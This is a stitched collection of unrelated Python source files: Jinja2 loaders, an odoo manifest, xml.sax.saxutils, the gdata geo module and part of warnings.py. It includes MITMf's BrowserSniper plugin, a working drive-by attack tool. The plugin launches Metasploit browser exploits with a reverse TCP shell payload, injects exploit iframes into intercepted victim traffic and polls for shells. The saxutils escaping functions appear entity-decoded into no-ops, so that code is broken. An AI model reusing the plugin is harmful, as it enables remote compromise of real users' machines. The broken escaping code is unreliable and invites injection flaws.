if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
mtime = path.getmtime(filename)
def uptodate():
try:
return path.getmtime(filename) == mtime
except OSError:
return False
return contents, filename, uptodate
raise TemplateNotFound(template)
def list_templates(self):
found = set()
for searchpath in self.searchpath:
walk_dir = os.walk(searchpath, followlinks=self.followlinks)
for dirpath, dirnames, filenames in walk_dir:
for filename in filenames:
template = os.path.join(dirpath, filename) \
[len(searchpath):].strip(os.path.sep) \
.replace(os.path.sep, '/')
if template[:2] == './':
template = template[2:]
if template not in found:
found.add(template)
return sorted(found)
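# A typical wiring sketch (Environment lives in jinja2.environment; the paths
# are made up):
#   from jinja2 import Environment, FileSystemLoader
#   env = Environment(loader=FileSystemLoader(['templates', 'fallback']))
#   tmpl = env.get_template('index.html')   # resolved via get_source() above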
class PackageLoader(BaseLoader):
"""Load templates from python eggs or packages. It is constructed with
the name of the python package and the path to the templates in that
package::
loader = PackageLoader('mypackage', 'views')
If the package path is not given, ``'templates'`` is assumed.
Per default the template encoding is ``'utf-8'`` which can be changed
by setting the `encoding` parameter to something else. Due to the nature
of eggs it's only possible to reload templates if the package was loaded
from the file system and not a zip file.
"""
def __init__(self, package_name, package_path='templates',
encoding='utf-8'):
from pkg_resources import DefaultProvider, ResourceManager, \
get_provider
provider = get_provider(package_name)
self.encoding = encoding
self.manager = ResourceManager()
self.filesystem_bound = isinstance(provider, DefaultProvider)
self.provider = provider
self.package_path = package_path
def get_source(self, environment, template):
pieces = split_template_path(template)
p = '/'.join((self.package_path,) + tuple(pieces))
if not self.provider.has_resource(p):
raise TemplateNotFound(template)
filename = uptodate = None
if self.filesystem_bound:
filename = self.provider.get_resource_filename(self.manager, p)
mtime = path.getmtime(filename)
def uptodate():
try:
return path.getmtime(filename) == mtime
except OSError:
return False
source = self.provider.get_resource_string(self.manager, p)
return source.decode(self.encoding), filename, uptodate
def list_templates(self):
path = self.package_path
if path[:2] == './':
path = path[2:]
elif path == '.':
path = ''
offset = len(path)
results = []
def _walk(path):
for filename in self.provider.resource_listdir(path):
fullname = path + '/' + filename
if self.provider.resource_isdir(fullname):
_walk(fullname)
else:
results.append(fullname[offset:].lstrip('/'))
_walk(path)
results.sort()
return results
class DictLoader(BaseLoader):
"""Loads a template from a python dict. It's passed a dict of unicode
strings bound to template names. This loader is useful for unittesting:
>>> loader = DictLoader({'index.html': 'source here'})
Because auto reloading is rarely useful this is disabled per default.
"""
def __init__(self, mapping):
self.mapping = mapping
def get_source(self, environment, template):
if template in self.mapping:
source = self.mapping[template]
return source, None, lambda: source == self.mapping.get(template)
raise TemplateNotFound(template)
def list_templates(self):
return sorted(self.mapping)
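# Unittest-style sketch:
#   from jinja2 import Environment
#   env = Environment(loader=DictLoader({'hello.txt': 'Hello {{ name }}!'}))
#   assert env.get_template('hello.txt').render(name='World') == 'Hello World!'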
class FunctionLoader(BaseLoader):
"""A loader that is passed a function which does the loading. The
function receives the name of the template and has to return either
an unicode string with the template source, a tuple in the form ``(source,
filename, uptodatefunc)`` or `None` if the template does not exist.
>>> def load_template(name):
... if name == 'index.html':
... return '...'
...
>>> loader = FunctionLoader(load_template)
The `uptodatefunc` is a function that is called if autoreload is enabled
and has to return `True` if the template is still up to date. For more
details have a look at :meth:`BaseLoader.get_source` which has the same
return value.
"""
def __init__(self, load_func):
self.load_func = load_func
def get_source(self, environment, template):
rv = self.load_func(template)
if rv is None:
raise TemplateNotFound(template)
elif isinstance(rv, string_types):
return rv, None, None
return rv
class PrefixLoader(BaseLoader):
"""A loader that is passed a dict of loaders where each loader is bound
to a prefix. The prefix is delimited from the template by a slash per
default, which can be changed by setting the `delimiter` argument to
something else::
loader = PrefixLoader({
'app1': PackageLoader('mypackage.app1'),
'app2': PackageLoader('mypackage.app2')
})
By loading ``'app1/index.html'`` the file from the app1 package is loaded,
by loading ``'app2/index.html'`` the file from the second.
"""
def __init__(self, mapping, delimiter='/'):
self.mapping = mapping
self.delimiter = delimiter
def get_loader(self, template):
try:
prefix, name = template.split(self.delimiter, 1)
loader = self.mapping[prefix]
except (ValueError, KeyError):
raise TemplateNotFound(template)
return loader, name
def get_source(self, environment, template):
loader, name = self.get_loader(template)
try:
return loader.get_source(environment, name)
except TemplateNotFound:
            # re-raise the exception with the correct filename here.
# (the one that includes the prefix)
raise TemplateNotFound(template)
@internalcode
def load(self, environment, name, globals=None):
loader, local_name = self.get_loader(name)
try:
return loader.load(environment, local_name, globals)
except TemplateNotFound:
            # re-raise the exception with the correct filename here.
# (the one that includes the prefix)
raise TemplateNotFound(name)
def list_templates(self):
result = []
for prefix, loader in iteritems(self.mapping):
for template in loader.list_templates():
result.append(prefix + self.delimiter + template)
return result
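# Dispatch sketch: with the mapping from the class docstring,
#   loader.get_loader('app1/index.html')
# returns (PackageLoader('mypackage.app1'), 'index.html'); a template name with
# an unknown prefix, or without the delimiter at all, raises TemplateNotFound.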
class ChoiceLoader(BaseLoader):
"""This loader works like the `PrefixLoader` just that no prefix is
specified. If a template could not be found by one loader the next one
is tried.
>>> loader = ChoiceLoader([
... FileSystemLoader('/path/to/user/templates'),
... FileSystemLoader('/path/to/system/templates')
... ])
This is useful if you want to allow users to override builtin templates
from a different location.
"""
def __init__(self, loaders):
self.loaders = loaders
def get_source(self, environment, template):
for loader in self.loaders:
try:
return loader.get_source(environment, template)
except TemplateNotFound:
pass
raise TemplateNotFound(template)
@internalcode
def load(self, environment, name, globals=None):
for loader in self.loaders:
try:
return loader.load(environment, name, globals)
except TemplateNotFound:
pass
raise TemplateNotFound(name)
def list_templates(self):
found = set()
for loader in self.loaders:
found.update(loader.list_templates())
return sorted(found)
class _TemplateModule(ModuleType):
"""Like a normal module but with support for weak references"""
class ModuleLoader(BaseLoader):
"""This loader loads templates from precompiled templates.
Example usage:
>>> loader = ChoiceLoader([
... ModuleLoader('/path/to/compiled/templates'),
... FileSystemLoader('/path/to/templates')
... ])
Templates can be precompiled with :meth:`Environment.compile_templates`.
"""
has_source_access = False
def __init__(self, path):
package_name = '_jinja2_module_templates_%x' % id(self)
# create a fake module that looks for the templates in the
# path given.
mod = _TemplateModule(package_name)
if isinstance(path, string_types):
path = [path]
else:
path = list(path)
mod.__path__ = path
sys.modules[package_name] = weakref.proxy(mod,
lambda x: sys.modules.pop(package_name, None))
# the only strong reference, the sys.modules entry is weak
# so that the garbage collector can remove it once the
# loader that created it goes out of business.
self.module = mod
self.package_name = package_name
@staticmethod
def get_template_key(name):
return 'tmpl_' + sha1(name.encode('utf-8')).hexdigest()
@staticmethod
def get_module_filename(name):
return ModuleLoader.get_template_key(name) + '.py'
@internalcode
def load(self, environment, name, globals=None):
key = self.get_template_key(name)
module = '%s.%s' % (self.package_name, key)
mod = getattr(self.module, module, None)
if mod is None:
try:
mod = __import__(module, None, None, ['root'])
except ImportError:
raise TemplateNotFound(name)
# remove the entry from sys.modules, we only want the attribute
# on the module object we have stored on the loader.
sys.modules.pop(module, None)
return environment.template_class.from_module_dict(
environment, mod.__dict__, globals)
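# Precompile-then-serve sketch (target path is hypothetical):
#   env.compile_templates('/tmp/compiled', zip=None)  # writes tmpl_<sha1>.py files
#   fast_env = Environment(loader=ModuleLoader('/tmp/compiled'))
#   fast_env.get_template('index.html')               # imported, not re-parsed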
|
gpl-3.0
|
sechacking/MITMf
|
plugins/browsersniper.py
|
26
|
6804
|
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
import random
import threading
from time import sleep
from plugins.plugin import Plugin
from plugins.browserprofiler import BrowserProfiler
class BrowserSniper(BrowserProfiler, Plugin):
name = "BrowserSniper"
optname = "browsersniper"
desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
version = "0.4"
def initialize(self, options):
self.options = options
self.msfip = options.ip
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
from core.msfrpc import Msf
self.msf = Msf()
self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
t = threading.Thread(name='sniper', target=self.snipe)
t.setDaemon(True)
t.start()
def _setupExploit(self, exploit, msfport):
self.log.debug('Setting up {}'.format(exploit))
rand_url = "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
rand_port = random.randint(1000, 65535)
#generate the command string to send to the virtual console
cmd = "use exploit/{}\n".format(exploit)
cmd += "set SRVPORT {}\n".format(msfport)
cmd += "set URIPATH {}\n".format(rand_url)
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST {}\n".format(self.msfip)
cmd += "set LPORT {}\n".format(rand_port)
cmd += "set ExitOnSession False\n"
cmd += "exploit -j\n"
self.msf.sendcommand(cmd)
return rand_url
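    # Resulting console script sketch (the exploit name, port and URL are
    # examples; real values are randomized at runtime):
    #   use exploit/multi/browser/some_plugin_vuln
    #   set SRVPORT 8080
    #   set URIPATH /KxTwq
    #   set PAYLOAD generic/shell_reverse_tcp
    #   ...
    #   exploit -j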
def _compat_system(self, os_config, brw_config, os, browser):
if (os_config == 'any') and (brw_config == 'any'):
return True
if (os_config == 'any') and (brw_config in browser):
return True
if (os_config in os) and (brw_config == 'any'):
return True
if (os_config in os) and (brw_config in browser):
return True
return False
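    # Matching sketch: with os_config='windows' and brw_config='any',
    # _compat_system('windows', 'any', 'windows 7', 'firefox') is True, since
    # 'windows' is a substring of the victim OS and 'any' wildcards the browser.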
def getExploits(self):
exploits = []
vic_ip = self.output['ip']
        # BrowserProfiler reports the OS under 'os_name' and the browser under
        # 'ua_name'; the two assignments were swapped in the original
        os = self.output['os_name']
        browser = self.output['ua_name']
java = None
flash = None
if self.output['java'] is not None:
java = self.output['java']
if self.output['flash'] is not None:
flash = self.output['flash']
self.log.info("{} => OS: {} | Browser: {} | Java: {} | Flash: {}".format(vic_ip, os, browser, java, flash))
for exploit, details in self.config['BrowserSniper']['exploits'].iteritems():
if self._compat_system(details['OS'].lower(), details['Browser'].lower(), os.lower(), browser.lower()):
if details['Type'].lower() == 'browservuln':
exploits.append(exploit)
elif details['Type'].lower() == 'pluginvuln':
if details['Plugin'].lower() == 'java':
if (java is not None) and (java in details['PluginVersions']):
exploits.append(exploit)
elif details['Plugin'].lower() == 'flash':
if (flash is not None) and (flash in details['PluginVersions']):
exploits.append(exploit)
self.log.info("{} => Compatible exploits: {}".format(vic_ip, exploits))
return exploits
def injectAndPoll(self, ip, url): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
self.log.info("{} => Now injecting iframe to trigger exploits".format(ip))
self.html_url = url
#The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
#Will also make sure the shell actually came from the box that we targeted
self.log.info('{} => Waiting for ze shellz, sit back and relax...'.format(ip))
poll_n = 1
while poll_n != 30:
if self.msf.sessionsfrompeer(ip):
self.log.info("{} => Client haz been 0wn3d! Enjoy!".format(ip))
self.sploited_ips.append(ip)
self.black_ips = self.sploited_ips #Add to inject plugin blacklist since box has been popped
self.html_url = None
return
poll_n += 1
sleep(2)
self.log.info("{} => Session not established after 60 seconds".format(ip))
self.html_url = None
def snipe(self):
while True:
if self.output:
vic_ip = self.output['ip']
if vic_ip not in self.sploited_ips:
msfport = self.config['BrowserSniper']['msfport']
exploits = self.getExploits()
if not exploits:
self.log.info('{} => Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
self.sploited_ips.append(vic_ip)
self.black_ips = self.sploited_ips
elif exploits and (vic_ip not in self.sploited_ips):
self.log.info("{} => Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
for exploit in exploits:
jobs = self.msf.findjobs(exploit)
if jobs:
self.log.info('{} => {} already started'.format(vic_ip, exploit))
url = self.msf.jobinfo(jobs[0])['uripath'] #get the url assigned to the exploit
else:
url = self._setupExploit(exploit, msfport)
iframe_url = 'http://{}:{}{}'.format(self.msfip, msfport, url)
self.injectAndPoll(vic_ip, iframe_url)
sleep(1)
|
gpl-3.0
|
colinligertwood/odoo
|
addons/base_gengo/__openerp__.py
|
68
|
2119
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automated Translations through Gengo API',
'version': '0.1',
'category': 'Tools',
'description': """
Automated Translations through Gengo API
========================================
This module installs a passive scheduler job for automated translations
through the Gengo API. To activate it, you must:
1) Configure your Gengo authentication parameters under `Settings > Companies > Gengo Parameters`
2) Launch the wizard under `Settings > Application Terms > Gengo: Manual Request of Translation` and follow its steps.
The wizard will activate the CRON job and the scheduler, and start the automatic translation via Gengo services for all the terms where you requested it.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': [
'gengo_sync_schedular_data.xml',
'ir_translation.xml',
'res_company_view.xml',
'wizard/base_gengo_translations_view.xml',
],
'demo': [],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
PlayUAV/MissionPlanner
|
Lib/xml/sax/saxutils.py
|
53
|
10131
|
"""\
A library of useful helper classes to the SAX classes, for the
convenience of application and driver writers.
"""
import os, urlparse, urllib, types
import handler
import xmlreader
try:
_StringTypes = [types.StringType, types.UnicodeType]
except AttributeError:
_StringTypes = [types.StringType]
# See whether the xmlcharrefreplace error handler is
# supported
try:
from codecs import xmlcharrefreplace_errors
_error_handling = "xmlcharrefreplace"
del xmlcharrefreplace_errors
except ImportError:
_error_handling = "strict"
def __dict_replace(s, d):
"""Replace substrings of a string using a dictionary."""
for key, value in d.items():
s = s.replace(key, value)
return s
def escape(data, entities={}):
"""Escape &, <, and > in a string of data.
You can escape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
# must do ampersand first
data = data.replace("&", "&")
data = data.replace(">", ">")
data = data.replace("<", "<")
if entities:
data = __dict_replace(data, entities)
return data
def unescape(data, entities={}):
"""Unescape &, <, and > in a string of data.
You can unescape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
data = data.replace("<", "<")
data = data.replace(">", ">")
if entities:
data = __dict_replace(data, entities)
# must do ampersand last
return data.replace("&", "&")
def quoteattr(data, entities={}):
"""Escape and quote an attribute value.
Escape &, <, and > in a string of data, then quote it for use as
an attribute value. The \" character will be escaped as well, if
necessary.
You can escape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
entities = entities.copy()
    entities.update({'\n': '&#10;', '\r': '&#13;', '\t': '&#9;'})
data = escape(data, entities)
if '"' in data:
if "'" in data:
data = '"%s"' % data.replace('"', """)
else:
data = "'%s'" % data
else:
data = '"%s"' % data
return data
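# Behaviour sketch (doctest style):
#   >>> escape('AT&T <tag>')
#   'AT&amp;T &lt;tag&gt;'
#   >>> quoteattr('a < b')
#   '"a &lt; b"'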
class XMLGenerator(handler.ContentHandler):
def __init__(self, out=None, encoding="iso-8859-1"):
if out is None:
import sys
out = sys.stdout
handler.ContentHandler.__init__(self)
self._out = out
self._ns_contexts = [{}] # contains uri -> prefix dicts
self._current_context = self._ns_contexts[-1]
self._undeclared_ns_maps = []
self._encoding = encoding
def _write(self, text):
if isinstance(text, str):
self._out.write(text)
else:
self._out.write(text.encode(self._encoding, _error_handling))
def _qname(self, name):
"""Builds a qualified name from a (ns_url, localname) pair"""
if name[0]:
# Per http://www.w3.org/XML/1998/namespace, The 'xml' prefix is
# bound by definition to http://www.w3.org/XML/1998/namespace. It
# does not need to be declared and will not usually be found in
# self._current_context.
if 'http://www.w3.org/XML/1998/namespace' == name[0]:
return 'xml:' + name[1]
# The name is in a non-empty namespace
prefix = self._current_context[name[0]]
if prefix:
# If it is not the default namespace, prepend the prefix
return prefix + ":" + name[1]
# Return the unqualified name
return name[1]
# ContentHandler methods
def startDocument(self):
self._write('<?xml version="1.0" encoding="%s"?>\n' %
self._encoding)
def startPrefixMapping(self, prefix, uri):
self._ns_contexts.append(self._current_context.copy())
self._current_context[uri] = prefix
self._undeclared_ns_maps.append((prefix, uri))
def endPrefixMapping(self, prefix):
self._current_context = self._ns_contexts[-1]
del self._ns_contexts[-1]
def startElement(self, name, attrs):
self._write('<' + name)
for (name, value) in attrs.items():
self._write(' %s=%s' % (name, quoteattr(value)))
self._write('>')
def endElement(self, name):
self._write('</%s>' % name)
def startElementNS(self, name, qname, attrs):
self._write('<' + self._qname(name))
for prefix, uri in self._undeclared_ns_maps:
if prefix:
self._out.write(' xmlns:%s="%s"' % (prefix, uri))
else:
self._out.write(' xmlns="%s"' % uri)
self._undeclared_ns_maps = []
for (name, value) in attrs.items():
self._write(' %s=%s' % (self._qname(name), quoteattr(value)))
self._write('>')
def endElementNS(self, name, qname):
self._write('</%s>' % self._qname(name))
def characters(self, content):
self._write(escape(content))
def ignorableWhitespace(self, content):
self._write(content)
def processingInstruction(self, target, data):
self._write('<?%s %s?>' % (target, data))
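# Usage sketch (Python 2, matching this module):
#   from StringIO import StringIO
#   out = StringIO()
#   gen = XMLGenerator(out, encoding='utf-8')
#   gen.startDocument()
#   gen.startElement('greeting', {'lang': 'en'})
#   gen.characters('hi')
#   gen.endElement('greeting')
#   # out.getvalue() now starts with '<?xml version="1.0" encoding="utf-8"?>'
#   # followed by '<greeting lang="en">hi</greeting>'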
class XMLFilterBase(xmlreader.XMLReader):
"""This class is designed to sit between an XMLReader and the
client application's event handlers. By default, it does nothing
but pass requests up to the reader and events on to the handlers
unmodified, but subclasses can override specific methods to modify
the event stream or the configuration requests as they pass
through."""
def __init__(self, parent = None):
xmlreader.XMLReader.__init__(self)
self._parent = parent
# ErrorHandler methods
def error(self, exception):
self._err_handler.error(exception)
def fatalError(self, exception):
self._err_handler.fatalError(exception)
def warning(self, exception):
self._err_handler.warning(exception)
# ContentHandler methods
def setDocumentLocator(self, locator):
self._cont_handler.setDocumentLocator(locator)
def startDocument(self):
self._cont_handler.startDocument()
def endDocument(self):
self._cont_handler.endDocument()
def startPrefixMapping(self, prefix, uri):
self._cont_handler.startPrefixMapping(prefix, uri)
def endPrefixMapping(self, prefix):
self._cont_handler.endPrefixMapping(prefix)
def startElement(self, name, attrs):
self._cont_handler.startElement(name, attrs)
def endElement(self, name):
self._cont_handler.endElement(name)
def startElementNS(self, name, qname, attrs):
self._cont_handler.startElementNS(name, qname, attrs)
def endElementNS(self, name, qname):
self._cont_handler.endElementNS(name, qname)
def characters(self, content):
self._cont_handler.characters(content)
def ignorableWhitespace(self, chars):
self._cont_handler.ignorableWhitespace(chars)
def processingInstruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
def skippedEntity(self, name):
self._cont_handler.skippedEntity(name)
# DTDHandler methods
def notationDecl(self, name, publicId, systemId):
self._dtd_handler.notationDecl(name, publicId, systemId)
def unparsedEntityDecl(self, name, publicId, systemId, ndata):
self._dtd_handler.unparsedEntityDecl(name, publicId, systemId, ndata)
# EntityResolver methods
def resolveEntity(self, publicId, systemId):
return self._ent_handler.resolveEntity(publicId, systemId)
# XMLReader methods
def parse(self, source):
self._parent.setContentHandler(self)
self._parent.setErrorHandler(self)
self._parent.setEntityResolver(self)
self._parent.setDTDHandler(self)
self._parent.parse(source)
def setLocale(self, locale):
self._parent.setLocale(locale)
def getFeature(self, name):
return self._parent.getFeature(name)
def setFeature(self, name, state):
self._parent.setFeature(name, state)
def getProperty(self, name):
return self._parent.getProperty(name)
def setProperty(self, name, value):
self._parent.setProperty(name, value)
# XMLFilter methods
def getParent(self):
return self._parent
def setParent(self, parent):
self._parent = parent
# --- Utility functions
def prepare_input_source(source, base = ""):
"""This function takes an InputSource and an optional base URL and
returns a fully resolved InputSource object ready for reading."""
if type(source) in _StringTypes:
source = xmlreader.InputSource(source)
elif hasattr(source, "read"):
f = source
source = xmlreader.InputSource()
source.setByteStream(f)
if hasattr(f, "name"):
source.setSystemId(f.name)
if source.getByteStream() is None:
sysid = source.getSystemId()
basehead = os.path.dirname(os.path.normpath(base))
sysidfilename = os.path.join(basehead, sysid)
if os.path.isfile(sysidfilename):
source.setSystemId(sysidfilename)
f = open(sysidfilename, "rb")
else:
source.setSystemId(urlparse.urljoin(base, sysid))
f = urllib.urlopen(source.getSystemId())
source.setByteStream(f)
return source
|
gpl-3.0
|
Zanzibar82/streamondemand.test
|
lib/gdata/geo/__init__.py
|
249
|
6006
|
# -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.geo, implementing geological positioning in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Picasa Web Albums uses the georss and gml namespaces for
elements defined in the GeoRSS and Geography Markup Language specifications.
Specifically, Picasa Web Albums uses the following elements:
georss:where
gml:Point
gml:pos
http://code.google.com/apis/picasaweb/reference.html#georss_reference
Picasa Web Albums also accepts geographic-location data in two other formats:
W3C format and plain-GeoRSS (without GML) format.
"""
#
#Over the wire, the Picasa Web Albums only accepts and sends the
#elements mentioned above, but this module will let you seamlessly convert
#between the different formats (TODO 2007-10-18 hg)
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
GEO_NAMESPACE = 'http://www.w3.org/2003/01/geo/wgs84_pos#'
GML_NAMESPACE = 'http://www.opengis.net/gml'
GEORSS_NAMESPACE = 'http://www.georss.org/georss'
class GeoBaseElement(atom.AtomBase):
"""Base class for elements.
To add new elements, you only need to add the element tag name to self._tag
and the namespace to self._namespace
"""
_tag = ''
_namespace = GML_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Pos(GeoBaseElement):
"""(string) Specifies a latitude and longitude, separated by a space,
    e.g. '35.669998 139.770004'"""
_tag = 'pos'
def PosFromString(xml_string):
return atom.CreateClassFromXMLString(Pos, xml_string)
class Point(GeoBaseElement):
"""(container) Specifies a particular geographical point, by means of
a <gml:pos> element."""
_tag = 'Point'
_children = atom.AtomBase._children.copy()
_children['{%s}pos' % GML_NAMESPACE] = ('pos', Pos)
def __init__(self, pos=None, extension_elements=None, extension_attributes=None, text=None):
GeoBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
if pos is None:
pos = Pos()
self.pos=pos
def PointFromString(xml_string):
return atom.CreateClassFromXMLString(Point, xml_string)
class Where(GeoBaseElement):
"""(container) Specifies a geographical location or region.
A container element, containing a single <gml:Point> element.
(Not to be confused with <gd:where>.)
Note that the (only) child attribute, .Point, is title-cased.
This reflects the names of elements in the xml stream
(principle of least surprise).
As a convenience, you can get a tuple of (lat, lon) with Where.location(),
and set the same data with Where.setLocation( (lat, lon) ).
Similarly, there are methods to set and get only latitude and longitude.
"""
_tag = 'where'
_namespace = GEORSS_NAMESPACE
_children = atom.AtomBase._children.copy()
_children['{%s}Point' % GML_NAMESPACE] = ('Point', Point)
def __init__(self, point=None, extension_elements=None, extension_attributes=None, text=None):
GeoBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
if point is None:
point = Point()
self.Point=point
def location(self):
"(float, float) Return Where.Point.pos.text as a (lat,lon) tuple"
try:
return tuple([float(z) for z in self.Point.pos.text.split(' ')])
except AttributeError:
return tuple()
def set_location(self, latlon):
"""(bool) Set Where.Point.pos.text from a (lat,lon) tuple.
Arguments:
lat (float): The latitude in degrees, from -90.0 to 90.0
lon (float): The longitude in degrees, from -180.0 to 180.0
Returns True on success.
"""
assert(isinstance(latlon[0], float))
assert(isinstance(latlon[1], float))
try:
self.Point.pos.text = "%s %s" % (latlon[0], latlon[1])
return True
except AttributeError:
return False
def latitude(self):
"(float) Get the latitude value of the geo-tag. See also .location()"
lat, lon = self.location()
return lat
    def longitude(self):
        "(float) Get the longitude value of the geo-tag. See also .location()"
        lat, lon = self.location()
        return lon
    longtitude = longitude  # misspelled alias kept for backwards compatibility
    def set_latitude(self, lat):
        """(bool) Set the latitude value of the geo-tag.
        Args:
        lat (float): The new latitude value
        See also .set_location()
        """
        _lat, lon = self.location()
        # set_location() takes a single (lat, lon) tuple
        return self.set_location((lat, lon))
    def set_longitude(self, lon):
        """(bool) Set the longitude value of the geo-tag.
        Args:
        lon (float): The new longitude value
        See also .set_location()
        """
        lat, _lon = self.location()
        # set_location() takes a single (lat, lon) tuple
        return self.set_location((lat, lon))
    set_longtitude = set_longitude  # misspelled alias kept for backwards compatibility
def WhereFromString(xml_string):
return atom.CreateClassFromXMLString(Where, xml_string)
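# Round-trip sketch (coordinates are made up):
#   w = Where()
#   w.set_location((35.669998, 139.770004))   # note: one (lat, lon) tuple
#   assert w.location() == (35.669998, 139.770004)
#   assert w.latitude() == 35.669998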
|
gpl-3.0
|
40223245/2015cdb_g6-team1
|
static/Brython3.1.1-20150328-091302/Lib/warnings.py
|
752
|
13825
|
"""Python part of the warnings subsystem."""
# Note: function level imports should *not* be used
# in this module as it may cause import lock deadlock.
# See bug 683658.
import linecache
import sys
__all__ = ["warn", "showwarning", "formatwarning", "filterwarnings",
"resetwarnings", "catch_warnings"]
def showwarning(message, category, filename, lineno, file=None, line=None):
"""Hook to write a warning to a file; replace if you like."""
if file is None:
file = sys.stderr
try:
file.write(formatwarning(message, category, filename, lineno, line))
except IOError:
pass # the file (probably stderr) is invalid - this warning gets lost.
def formatwarning(message, category, filename, lineno, line=None):
"""Function to format a warning the standard way."""
s = "%s:%s: %s: %s\n" % (filename, lineno, category.__name__, message)
line = linecache.getline(filename, lineno) if line is None else line
if line:
line = line.strip()
s += " %s\n" % line
return s
def filterwarnings(action, message="", category=Warning, module="", lineno=0,
append=False):
"""Insert an entry into the list of warnings filters (at the front).
'action' -- one of "error", "ignore", "always", "default", "module",
or "once"
'message' -- a regex that the warning message must match
'category' -- a class that the warning must be a subclass of
'module' -- a regex that the module name must match
'lineno' -- an integer line number, 0 matches all warnings
'append' -- if true, append to the list of filters
"""
import re
assert action in ("error", "ignore", "always", "default", "module",
"once"), "invalid action: %r" % (action,)
assert isinstance(message, str), "message must be a string"
assert isinstance(category, type), "category must be a class"
assert issubclass(category, Warning), "category must be a Warning subclass"
assert isinstance(module, str), "module must be a string"
assert isinstance(lineno, int) and lineno >= 0, \
"lineno must be an int >= 0"
item = (action, re.compile(message, re.I), category,
re.compile(module), lineno)
if append:
filters.append(item)
else:
filters.insert(0, item)
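# Usage sketch: turn every DeprecationWarning raised from the (hypothetical)
# package 'mylib' into an exception:
#   import warnings
#   warnings.filterwarnings('error', category=DeprecationWarning, module='mylib')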
def simplefilter(action, category=Warning, lineno=0, append=False):
"""Insert a simple entry into the list of warnings filters (at the front).
A simple filter matches all modules and messages.
'action' -- one of "error", "ignore", "always", "default", "module",
or "once"
'category' -- a class that the warning must be a subclass of
'lineno' -- an integer line number, 0 matches all warnings
'append' -- if true, append to the list of filters
"""
assert action in ("error", "ignore", "always", "default", "module",
"once"), "invalid action: %r" % (action,)
assert isinstance(lineno, int) and lineno >= 0, \
"lineno must be an int >= 0"
item = (action, None, category, None, lineno)
if append:
filters.append(item)
else:
filters.insert(0, item)
def resetwarnings():
"""Clear the list of warning filters, so that no filters are active."""
filters[:] = []
class _OptionError(Exception):
"""Exception used by option processing helpers."""
pass
# Helper to process -W options passed via sys.warnoptions
def _processoptions(args):
for arg in args:
try:
_setoption(arg)
except _OptionError as msg:
print("Invalid -W option ignored:", msg, file=sys.stderr)
# Helper for _processoptions()
def _setoption(arg):
import re
parts = arg.split(':')
if len(parts) > 5:
raise _OptionError("too many fields (max 5): %r" % (arg,))
while len(parts) < 5:
parts.append('')
action, message, category, module, lineno = [s.strip()
for s in parts]
action = _getaction(action)
message = re.escape(message)
category = _getcategory(category)
module = re.escape(module)
if module:
module = module + '$'
if lineno:
try:
lineno = int(lineno)
if lineno < 0:
raise ValueError
except (ValueError, OverflowError):
raise _OptionError("invalid lineno %r" % (lineno,))
else:
lineno = 0
filterwarnings(action, message, category, module, lineno)
# Helper for _setoption()
def _getaction(action):
if not action:
return "default"
if action == "all": return "always" # Alias
for a in ('default', 'always', 'ignore', 'module', 'once', 'error'):
